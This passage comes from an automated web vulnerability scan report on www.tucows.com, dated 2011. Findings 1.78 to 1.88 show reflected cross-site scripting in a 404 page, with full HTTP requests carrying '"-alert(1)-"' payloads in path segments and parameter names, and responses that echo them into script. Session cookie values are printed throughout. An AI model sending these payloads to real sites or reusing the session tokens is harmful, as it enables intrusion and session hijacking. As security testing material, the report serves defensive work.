topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes16ea9"-alert(1)-"fa1a0931a13/03BlueMeany/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.78. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5393"-alert(1)-"cb3cdfe4732 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes/03BlueMeanyd5393"-alert(1)-"cb3cdfe4732/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes/03BlueMeanyd5393"-alert(1)-"cb3cdfe4732/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.79. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6aa0e"-alert(1)-"a1b4df2075b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes/03BlueMeany/styles.css6aa0e"-alert(1)-"a1b4df2075b HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css6aa0e"-alert(1)-"a1b4df2075b";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.80. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acf37"-alert(1)-"829dd6d7186 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes/03BlueMeany/styles.css?acf37"-alert(1)-"829dd6d7186=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css?acf37"-alert(1)-"829dd6d7186=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.81. http://www.tucows.com/images/newassets/javascript:void(null) [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f522"-alert(1)-"246c1c75e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. The path /images/newassets/javascript:void(null) is most likely a crawler artefact (a javascript:void(null) href resolved as a relative URL rather than a real resource), but that does not weaken the finding: the 404 handler reflects whatever request URI it receives, as the response below shows.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images7f522"-alert(1)-"246c1c75e2/newassets/javascript:void(null) HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:34 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images7f522"-alert(1)-"246c1c75e2/newassets/javascript:void(null)";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.82. http://www.tucows.com/images/newassets/javascript:void(null) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3c15"-alert(1)-"6e3e5a56f01 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassetsc3c15"-alert(1)-"6e3e5a56f01/javascript:void(null) HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassetsc3c15"-alert(1)-"6e3e5a56f01/javascript:void(null)";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.83. http://www.tucows.com/images/newassets/javascript:void(null) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1045a"-alert(1)-"0b7ffb9ae62 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/javascript:void(null)1045a"-alert(1)-"0b7ffb9ae62 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/javascript:void(null)1045a"-alert(1)-"0b7ffb9ae62";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.84. http://www.tucows.com/images/newassets/javascript:void(null) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55e7b"-alert(1)-"e4c6b9e0aae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/javascript:void(null)?55e7b"-alert(1)-"e4c6b9e0aae=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/javascript:void(null)?55e7b"-alert(1)-"e4c6b9e0aae=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.85. http://www.tucows.com/images/newassets/lostpass.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8030"-alert(1)-"d2a10cd4b2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesb8030"-alert(1)-"d2a10cd4b2f/newassets/lostpass.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagesb8030"-alert(1)-"d2a10cd4b2f/newassets/lostpass.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.86. http://www.tucows.com/images/newassets/lostpass.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2408f"-alert(1)-"745fc17afdb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets2408f"-alert(1)-"745fc17afdb/lostpass.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets2408f"-alert(1)-"745fc17afdb/lostpass.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.87. http://www.tucows.com/images/newassets/lostpass.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f369"-alert(1)-"1c6dab942a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/lostpass.html3f369"-alert(1)-"1c6dab942a HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/lostpass.html3f369"-alert(1)-"1c6dab942a";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.88. http://www.tucows.com/images/newassets/lostpass.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10cdc"-alert(1)-"bef9c960c47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/lostpass.html?10cdc"-alert(1)-"bef9c960c47=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:22 GMT
Server: Apache/2.2.14 (Ubuntu)
